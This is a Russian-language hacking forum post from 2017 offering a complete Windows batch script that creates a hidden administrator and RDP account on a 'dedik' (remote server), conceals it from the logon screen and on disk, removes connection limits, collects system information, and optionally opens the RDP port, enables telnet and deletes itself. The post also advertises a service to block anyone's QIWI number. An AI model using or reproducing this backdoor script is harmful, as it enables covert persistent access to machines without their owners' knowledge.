/ Регистрация

Создание скрытой учетки на дедике BAT\CMD

Тема в разделе "Сборник статей по безопасности и анонимности", создана пользователем Hermanicus, 8 мар 2017.

  1. Hermanicus

    Hermanicus

    492
    16
    Код:
    @Echo off
    set user=ПОЛЬЗОВАТЕЛЬ
    set pass=ПАРОЛЬ

    set AdmGroupSID=S-1-5-32-544
    set AdmGroup=
    For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do set AdmGroup=%%J
    set AdmGroup=%AdmGroup:~0,-1%
    net user %user% %pass% /add /active:"yes" /expires:"never" /passwordchg:"NO"
    net localgroup %AdmGroup% %user% /add
    set RDPGroupSID=S-1-5-32-555
    set RDPGroup=
    For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do set RDPGroup=%%J
    set RDPGroup=%RDPGroup:~0,-1%
    net localgroup "%RDPGroup%" %user% /add
    net accounts /forcelogoff:no /maxpwage:unlimited
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
    reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %user% /t REG_DWORD /d 0x0 /f

    if not exist %systemdrive%\users\%user% mkdir %systemdrive%\users\%user%
    attrib %systemdrive%\users\%user% +r +a +s +h

    dxdiag /whql:eek:ff /t c:\systeminfo.txt
    systeminfo >> c:\systeminfo.txt
    ipconfig >> c:\systeminfo.txt

    ::netsh firewall add portopening TCP 3389 "Remote Desktop"
    ::sc config tlntsvr start=auto
    ::tlntadmn config port=2323 sec=-NTLM
    ::net start Telnet
    ::shutdown.exe -r -t 00 -f
    ::del %0
    Что умеет?

    [+] Создает админскую учетку на дедике. (админские группы ищет сам.)
    [+] Убирает лимиты на подключение.
    [+] Скрывает учетку в реестре.
    [+] Скрывает учетку на диске.
    [+] Сохраняет всю инфу о дедике в.txt (dxdiag, systeminfo, ipconfig)

    По желанию
    [+] Добавляет 3389 порт в исключения брандмауэра.
    [+] Поднимает telnet на вашем порту.
    [+] Перезагрузка.
    [+] Удаляет сам себя.

    © интернет
    Предлагаю услуги по:
    1. Сделаю зеркало любого сайта в сети ТОR
    2. Блокировка ЛЮБОГО QIWI Номера (Быстро)

    [​IMG]
    Мануалы и софт выложены в ознакомительных целях вся ответственность за использования ложится на вас.
    Софт советую использовать на виртуалке.
     
    Hermanicus, 8 мар 2017
    #1

Поделиться этой страницей